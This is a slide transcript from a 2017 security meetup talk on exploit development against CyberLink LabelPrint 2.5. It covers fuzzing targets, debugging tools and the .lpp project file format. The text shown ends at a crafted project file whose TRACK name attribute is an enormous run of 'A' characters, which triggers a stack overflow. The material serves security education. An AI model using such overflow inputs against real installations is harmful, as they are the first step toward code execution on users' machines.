CyberLink LabelPrint 2.5 Exploitation Process

This presentation was given at IT Audit & IT Security Meetup #4 at Indonesian Cloud, Jakarta.
The exploit development process was quite challenging and we think it is worth sharing.
For educational purposes only.

Published in: Software

1. Exploit Development: CyberLink LabelPrint 2.5 Unicode Stack Overflow
   IT Audit & IT Security Meetup #4 - Sharing in the Cloud, Indonesian Cloud, Jakarta, 13 October 2017

2. Who?
   - Thomas Gregory - @modpr0be
     - IT Security consultant @Spentera
     - Security researcher (occasionally), focus on Windows exploitation
     - IT Security trainer (sometimes)
   - f3ci - ????
     - Security researcher
     - Penetration tester, red team
     - Appsec & simple exploit dev

3. What?
   - CyberLink LabelPrint 2.5
     - Labeling software
     - Embedded by default in the CyberLink Power2Go installation
     - Included as bloatware in all Lenovo, HP, Asus laptops somewhere between 2015-2016

4. Why?
   - The exploit development is quite challenging and interesting
   - We want to share it for education purposes only

5. Let's Begin: THE FUZZ

6. Fuzzing possibilities
   - File input
     - import
     - open media
     - open project
   - Registry overflow

7. Tools
   - Immunity Debugger with the mona plugin
   - Editor/IDE (/me using Sublime Text)

8. LabelPrint Project
   - Project file with extension .lpp
   - Header:

         <PROJECT version="1.0.00">
         <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
         <TRACK name="" />

9. The Bug
   - In the name parameter, inside the TRACK tag:

         <PROJECT version="1.0.00">
         <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
         <TRACK name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA